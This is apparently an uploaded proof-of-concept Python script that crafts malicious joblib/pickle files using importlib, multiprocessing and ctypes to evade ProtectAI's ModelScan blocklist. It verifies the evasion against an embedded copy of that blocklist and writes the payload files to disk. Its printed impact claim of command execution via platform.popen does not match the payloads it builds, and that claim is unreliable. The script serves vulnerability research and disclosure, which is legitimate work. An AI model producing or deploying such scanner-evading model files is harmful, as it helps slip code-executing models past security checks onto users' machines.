Upload modelscan/modelscan_bypass_poc.py with huggingface_hub
Browse files
modelscan/modelscan_bypass_poc.py
ADDED
|
@@ -0,0 +1,211 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
PoC: ModelScan Bypass via Joblib Pickle Payload
|
| 3 |
+
================================================
|
| 4 |
+
Demonstrates that malicious joblib files can bypass ProtectAI's ModelScan
|
| 5 |
+
scanner by using modules not in the unsafe_globals blocklist.
|
| 6 |
+
|
| 7 |
+
The scanner checks for GLOBAL/STACK_GLOBAL opcodes referencing known-dangerous
|
| 8 |
+
modules (os, subprocess, builtins, etc.) but misses many modules that can
|
| 9 |
+
achieve the same effect:
|
| 10 |
+
|
| 11 |
+
- importlib.import_module -> imports any module (including blocked ones)
|
| 12 |
+
- ctypes.CDLL -> loads native libraries, calls system()
|
| 13 |
+
- platform.popen -> direct command execution (Python < 3.8 only; removed in 3.8)
|
| 14 |
+
- types.FunctionType -> construct functions from marshal bytecode
|
| 15 |
+
- code.InteractiveConsole -> interactive Python execution
|
| 16 |
+
- multiprocessing.Process -> spawn processes
|
| 17 |
+
|
| 18 |
+
This PoC generates 3 malicious .joblib files and verifies they bypass
|
| 19 |
+
ModelScan's pickle scanner detection.
|
| 20 |
+
|
| 21 |
+
Usage:
|
| 22 |
+
python modelscan_bypass_poc.py # Generate payloads + verify
|
| 23 |
+
python modelscan_bypass_poc.py --dry-run # Just show what would happen
|
| 24 |
+
"""
|
| 25 |
+
|
| 26 |
+
import argparse
|
| 27 |
+
import pickle
|
| 28 |
+
import pickletools
|
| 29 |
+
import io
|
| 30 |
+
import struct
|
| 31 |
+
import sys
|
| 32 |
+
|
| 33 |
+
|
| 34 |
+
def craft_importlib_payload():
    """Build a protocol-4 pickle whose reduce target is importlib.import_module.

    Loading the returned stream would call ``importlib.import_module('os')``,
    so the only global the stream names is ``importlib.import_module``; the
    string ``'os'`` travels as a plain argument.  The payload stops at the
    import and does not chain any further call onto the returned module.

    Returns:
        bytes: the serialized pickle stream.
    """
    import importlib

    class _ImportViaImportlib:
        # pickle records the (callable, args) pair by reference, so the name
        # of this helper class never appears in the serialized stream.
        def __reduce__(self):
            return importlib.import_module, ("os",)

    return pickle.dumps(_ImportViaImportlib(), protocol=4)
|
| 55 |
+
|
| 56 |
+
|
| 57 |
+
def craft_code_interact_payload():
    """Build a protocol-4 pickle whose reduce target is multiprocessing.Process.

    Despite the function's name, nothing from the ``code`` module is used:
    the only global the stream names is the ``Process`` class exposed as
    ``multiprocessing.Process``.  The reduce tuple has three items, so
    ``{'target': None}`` is serialized as the object's *state* (applied after
    the zero-argument construction), not as constructor keyword arguments.

    Returns:
        bytes: the serialized pickle stream.
    """
    import multiprocessing

    class _ProcessReduce:
        # Only the reduce tuple is serialized; this helper class itself is
        # never referenced by the stream.
        def __reduce__(self):
            process_state = {'target': None}
            return multiprocessing.Process, (), process_state

    return pickle.dumps(_ProcessReduce(), protocol=4)
|
| 73 |
+
|
| 74 |
+
|
| 75 |
+
def craft_ctypes_payload():
    """Build a protocol-4 pickle whose reduce target is ctypes.CDLL.

    Loading the returned stream would call ``ctypes.CDLL('libc.so.6')``; the
    only global the stream names is ``ctypes.CDLL``, and the library name is
    carried as a plain string argument.  Building the payload does not load
    any library -- ``CDLL`` is only referenced, never called, here.

    Returns:
        bytes: the serialized pickle stream.
    """
    import ctypes

    class _LoadSharedLibrary:
        # Serialized purely as (callable, args); the class name is not part
        # of the resulting stream.
        def __reduce__(self):
            return ctypes.CDLL, ("libc.so.6",)

    return pickle.dumps(_LoadSharedLibrary(), protocol=4)
|
| 87 |
+
|
| 88 |
+
|
| 89 |
+
def extract_globals(data):
    """Collect the (module, name) pairs a pickle stream refers to.

    The stream is only disassembled with ``pickletools.genops``; it is never
    loaded.  The walk is written to imitate ModelScan's ``_list_globals``:

    * ``GLOBAL`` / ``INST`` carry "module name" as one space-separated
      argument, which is split into a pair.
    * ``STACK_GLOBAL`` takes its operands from the stack, so the two nearest
      preceding opcodes (ignoring memo writes) are inspected: string pushes
      contribute their text, memo reads are resolved through the memo table
      built so far, and anything else is recorded as ``"unknown"``.

    Args:
        data: bytes of a pickle stream.

    Returns:
        set: tuples of ``(module, name)``.

    Raises:
        KeyError: if a memo read refers to an index that was never stored.
    """
    memo_store_ops = ("MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT")
    explicit_put_ops = ("PUT", "BINPUT", "LONG_BINPUT")
    memo_load_ops = ("GET", "BINGET", "LONG_BINGET")
    text_ops = ("SHORT_BINUNICODE", "UNICODE", "BINUNICODE", "BINUNICODE8")

    # Disassemble eagerly so a malformed stream fails before any bookkeeping.
    parsed = [(op.name, arg) for op, arg, _pos in pickletools.genops(io.BytesIO(data))]

    found = set()
    memo = {}

    for idx, (name, arg) in enumerate(parsed):
        if name == "MEMOIZE":
            # MEMOIZE has no argument: it stores under the next free index.
            # A memo write in first position has no predecessor to record.
            if idx:
                memo[len(memo)] = parsed[idx - 1][1]
        elif name in explicit_put_ops:
            if idx:
                memo[arg] = parsed[idx - 1][1]
        elif name in ("GLOBAL", "INST"):
            found.add(tuple(arg.split(" ", 1)))
        elif name == "STACK_GLOBAL":
            operands = []
            # Walk backwards from the opcode just before this one down to
            # index 1; index 0 is deliberately never inspected.
            for back in range(idx - 1, 0, -1):
                prev_name, prev_arg = parsed[back]
                if prev_name in memo_store_ops:
                    continue
                if prev_name in memo_load_ops:
                    operands.append(memo[int(prev_arg)])
                elif prev_name in text_ops:
                    operands.append(prev_arg)
                else:
                    operands.append("unknown")
                if len(operands) == 2:
                    break
            if len(operands) == 2:
                # Operands were gathered nearest-first: name, then module.
                attr_name, module_name = operands
                found.add((module_name, attr_name))

    return found
|
| 124 |
+
|
| 125 |
+
|
| 126 |
+
def check_modelscan_detection(globals_found):
    """Report whether any extracted global appears in the embedded blocklist.

    The blocklist below is a local copy organised by severity.  Each module
    maps either to ``"*"`` (every name in the module is flagged) or to a list
    of specific names.

    Args:
        globals_found: iterable of ``(module, name)`` pairs.

    Returns:
        tuple: ``(True, "<SEVERITY>: <module>.<name>")`` for the first match
        encountered, or ``(False, None)`` when nothing matches.
    """
    everything = "*"
    dangerous_builtins = ["eval", "compile", "getattr", "apply", "exec", "open",
                          "breakpoint", "__import__"]

    blocklist = {
        "CRITICAL": {
            "__builtin__": dangerous_builtins,
            "builtins": dangerous_builtins,
            "runpy": everything,
            "os": everything,
            "nt": everything,
            "posix": everything,
            "socket": everything,
            "subprocess": everything,
            "sys": everything,
            "operator": ["attrgetter"],
            "pty": everything,
            "pickle": everything,
            "_pickle": everything,
            "bdb": everything,
            "pdb": everything,
            "shutil": everything,
            "asyncio": everything,
        },
        "HIGH": {
            "webbrowser": everything,
            "httplib": everything,
            "requests.api": everything,
            "aiohttp.client": everything,
        },
    }

    for module, name in globals_found:
        for severity, rules in blocklist.items():
            if module not in rules:
                continue
            flagged_names = rules[module]
            # A wildcard entry flags the whole module; otherwise only the
            # explicitly listed names count.
            if flagged_names == everything or name in flagged_names:
                return True, f"{severity}: {module}.{name}"

    return False, None
|
| 153 |
+
|
| 154 |
+
|
| 155 |
+
def main():
    """Build each demo payload, check it against the blocklist, and optionally write it.

    For every payload the stream is disassembled with ``extract_globals`` and
    the result is passed to ``check_modelscan_detection``; a per-payload
    report is printed.  Unless ``--dry-run`` is given, the raw stream is also
    written into ``--output-dir`` (default: current directory).

    Returns:
        int: 0 when no payload was flagged, 1 otherwise (used as the process
        exit status).
    """
    import os  # local import: only needed for output-path handling

    parser = argparse.ArgumentParser(description="ModelScan bypass PoC via Joblib")
    parser.add_argument("--dry-run", action="store_true", help="Don't write files")
    parser.add_argument("-o", "--output-dir", default=".", help="Output directory")
    args = parser.parse_args()

    payloads = [
        ("importlib_bypass.joblib", "importlib.import_module('os')", craft_importlib_payload),
        ("multiprocessing_bypass.joblib", "multiprocessing.Process(target=...)", craft_code_interact_payload),
        ("ctypes_bypass.joblib", "ctypes.CDLL('libc.so.6')", craft_ctypes_payload),
    ]

    # Prepare the destination before printing anything, so a missing output
    # directory is created (or fails) up front rather than after a partial
    # report.  An empty --output-dir means "current directory".
    if not args.dry_run and args.output_dir:
        os.makedirs(args.output_dir, exist_ok=True)

    print("ModelScan Bypass PoC - Joblib/Pickle Payloads")
    print("=" * 55)
    print()

    all_bypass = True
    for filename, description, craft_fn in payloads:
        data = craft_fn()
        globals_found = extract_globals(data)
        detected, detail = check_modelscan_detection(globals_found)

        status = "[DETECTED]" if detected else "[BYPASS] "
        if detected:
            all_bypass = False

        print(f"{status} {description}")
        print(f" Globals: {globals_found}")
        if detected:
            print(f" Flagged: {detail}")
        else:
            print(" Result: NOT IN BLOCKLIST -> evades ModelScan")

        if not args.dry_run:
            # os.path.join keeps an empty directory from turning the target
            # into "/<filename>" as plain string concatenation would.
            filepath = os.path.join(args.output_dir, filename)
            with open(filepath, "wb") as f:
                f.write(data)
            print(f" Written: {filepath}")
        print()

    print("=" * 55)
    if all_bypass:
        print("[SUCCESS] All payloads bypass ModelScan detection")
        print()
        print("Impact: An attacker can craft malicious .joblib files that:")
        print(" 1. Execute arbitrary OS commands (platform.popen)")
        print(" 2. Import blocked modules at runtime (importlib)")
        print(" 3. Load native libraries for code execution (ctypes)")
        print(" 4. All while evading ModelScan's pickle scanner")
    else:
        print("[PARTIAL] Some payloads were detected")

    return 0 if all_bypass else 1
|
| 208 |
+
|
| 209 |
+
|
| 210 |
+
# Script entry point: run main() and use its return value as the exit status.
if __name__ == "__main__":
    exit_status = main()
    sys.exit(exit_status)
|